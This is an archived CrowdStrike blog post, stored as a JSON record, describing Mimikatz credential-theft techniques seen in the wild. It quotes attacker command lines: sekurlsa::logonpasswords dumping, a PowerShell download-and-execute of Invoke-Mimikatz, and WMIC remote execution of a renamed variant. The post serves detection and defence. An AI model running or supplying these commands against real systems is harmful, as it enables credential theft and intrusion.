{
	"id": "114ad4cb-fef4-4ff7-b1c7-f98ec4700802",
	"created_at": "2026-04-06T00:09:52.223905Z",
	"updated_at": "2026-04-10T13:12:39.097089Z",
	"deleted_at": null,
	"sha1_hash": "c3b5b9a94d74e8fe4c2d76882ab6d7dcb17524d5",
	"title": "Mimikatz Credential Theft Techniques | CrowdStrike",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 64425,
	"plain_text": "Mimikatz Credential Theft Techniques | CrowdStrike\r\nBy harlan.carvey\r\nArchived: 2026-04-05 20:18:58 UTC\r\nThis blog shares information on some examples of how the CrowdStrike® Falcon® OverWatch™ team has\r\nobserved the open-source tool known as Mimikatz being used in the wild – including an unusual use of the tool to\r\nstrictly bypass brittle signature-based detections. The OverWatch team has comprehensive levels of visibility into\r\nattempted attacks against our customers’ infrastructures, and that visibility is extended by the shear breadth of our\r\ncustomer base. This means the OverWatch team is able to observe a wide range of adversary activity from the\r\nsystem visibility provided by the Falcon endpoint security platform.\r\nCredential Access for Privilege Escalation\r\nOne frequently observed aspect of adversary activity is credential access. Actors often seek out valid credentials in\r\norder to escalate their privileges and extend their reach within an infrastructure — and they do so via a variety of\r\nmeans. In fact, the OverWatch team has previously observed cases in which adversaries have employed multiple\r\ncredential theft techniques against a single victim. (An example of adversaries using multiple credential\r\ntechniques is included in the 2018 Falcon OverWatch Report.) One popular means of credential access is the use\r\nof Mimikatz, described as the “AK47 of cyber” by CrowdStrike Co-Founder and CTO Dmitri Alperovitch. The\r\nOverWatch team regularly sees Mimikatz used by both targeted adversaries and pen testers.\r\nChanging the Executable Name\r\nThe most simple and direct technique for using this tool is for the actor to copy it to a compromised system,\r\nchange the name of the executable and launch it using, for example, the following command line:\r\nc:\\ProgramData\\p.exe \"\"privilege::debug\"\" \"\"sekurlsa::logonpasswords\"\" This allows the actor to access\r\ncredential information on a system.\r\nUsing a Batch File\r\nOther means of launching this tool that have been observed include using a batch file to copy the tool over to\r\ntarget systems; launching the tool and sending the output to a file; copying the output files back to a central\r\ncollection point; and finally, deleting all relevant files off of the target systems.\r\nUsing a PowerShell Variant\r\nAnother means of gaining access to credential information that OverWatch analysts have observed is the use of a\r\nPowerShell variant of Mimikatz, as seen in the following example: powershell -ep Bypass -NoP -NonI -NoLogo\r\n-c IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent\u003c.\u003ecom//Invoke-Mimikatz.ps1');Invoke-Mimikatz -Command 'privilege::debug sekurlsa :: logonpasswords exit'\r\nhttps://www.crowdstrike.com/blog/credential-theft-mimikatz-techniques/\r\nPage 1 of 2\n\nChanging Command Line Options\r\nDuring the last quarter of 2018, OverWatch analysts observed a different use of the Mimikatz tool, specifically\r\none that appears to have been modified to change the command line options. It appears as follows: mnl.exe\r\npr::dg sl ::lp et -p This specific variant of Mimikatz was run against multiple target systems through the use\r\nof WMIC.exe, as illustrated below: Wmic /NODE:\"\" /USER:\"\" /password: process call create \"cmd.exe /c\r\n(c:\\windows\\security\\mnl.exe pr::dg sl ::lp et -p \u003ec:\\windows\\security\\PList.txt) \u003e\u003e\r\nc:\\windows\\temp\\temp.txt\"\r\nMonitoring for IOAs Is Crucial\r\nThese techniques are clearly an attempt to evade brittle detection approaches that only rely on looking at\r\ncommand line options of the executable to infer its purpose, or checking for presence of relevant strings in the\r\nbinary file. While there are a number of techniques that actors can employ to access credential information, the\r\nFalcon platform provides a level of visibility that allows defenders to see new techniques being used, even when\r\nthose techniques are specifically aimed at evading or subverting detection mechanisms. This further demonstrates\r\nthe value of monitoring for Indicators of attack (IOAs), which focus on behavioral aspects of attacker techniques,\r\nrather than focusing only on typical indicators of compromise (IOCs), such as file names, hashes or single\r\ncommand line options.\r\nAdditional Resources\r\nDownload the 2020 CrowdStrike Global Threat Report\r\nDownload the 2018 CrowdStrike Falcon® OverWatch Report.\r\nTest CrowdStrike next-gen AV for yourself: Start your free trial of Falcon Prevent™ today.\r\nSource: https://www.crowdstrike.com/blog/credential-theft-mimikatz-techniques/\r\nhttps://www.crowdstrike.com/blog/credential-theft-mimikatz-techniques/\r\nPage 2 of 2",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.crowdstrike.com/blog/credential-theft-mimikatz-techniques/"
	],
	"report_names": [
		"credential-theft-mimikatz-techniques"
	],
	"threat_actors": [],
	"ts_created_at": 1775434192,
	"ts_updated_at": 1775826759,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c3b5b9a94d74e8fe4c2d76882ab6d7dcb17524d5.pdf",
		"text": "https://archive.orkl.eu/c3b5b9a94d74e8fe4c2d76882ab6d7dcb17524d5.txt",
		"img": "https://archive.orkl.eu/c3b5b9a94d74e8fe4c2d76882ab6d7dcb17524d5.jpg"
	}
}